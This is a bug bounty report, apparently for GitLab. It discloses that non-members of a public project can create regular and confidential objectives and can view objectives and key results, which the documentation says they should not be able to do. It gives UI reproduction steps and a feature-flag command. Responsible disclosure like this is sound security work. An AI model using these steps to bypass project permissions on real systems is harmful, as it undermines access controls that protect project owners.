A user who is not a member of a project is capable of creating regular/confidential objectives inside the project contrary to documentation
HackerOne report #2223468 by ricardobrito
on 2023-10-24, assigned to @ngeorge1:
Report | Attachments | How To Reproduce
Report
Hi team,
Summary
I would like to report 4 issues here:
-
According to the documentation, a user needs at least
guest
role in a project in order to be able to create objectives inside the project:However, I have found that a user who is not a member of a project (not even
guest
role) is capable of creating objectives inside the project. -
According to the documentation, you must have at least reporter role in order to create a confidential objective:
However I have found that a user who does not even have
guest
role (not part of the project) is capable of creating a confidential objectve. -
According to the documentation, a user must have at least
guest
role for the project in order to be able to view an objective:However, I have found that a user who is not a member of a project (not even
guest
role) is capable of viewing objectives created by other users. -
According to the documentation a user needs at least
guest
role inside a project in order to view an objective's key results:However, I have found that a user who is not a member of a project is capable of viewing key results.
Pre-Requisites
You need to enable the flag okrs_mvc
for the instance in order to be able to access the objectives feature:
Feature.enable(:okrs_mvc)
Steps to reproduce
- As user A, create a public project.
- As user B, go to the project's issues, on the top right corner (where it says new issue), press the arrow button and select new objective
- Fill in the text and click on
create objective
and the objective is created even though you do not even have guest role in the project - As user A, create an objective by following the above steps. Inside the objective you can also create a key result.
- As user B, go to the project issues and you will be able to view the objectives created by user A (and after you click on it you will also be able to view the key results added to it), even though the documentation says you need at least guest role.
- As user B, create another objective but mark it as confidential. The objective will be created and it will be confidential, contrary to the documentation that states that you need at least reporter role in order to create confidential objectives.
The most impactful thing here is that a user who is not a member of the project should not be able to create objectives inside the project, but it is possible for this user to create confidential objectives as well.
I will let the [@]gitlab team determine the impact.
POC Video
objectives-permission-issues.mov
Impact
A user who is not a project member is capable of viewing objectives created by other users, capable of creating regular and confidential objectives contrary to the documentation.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: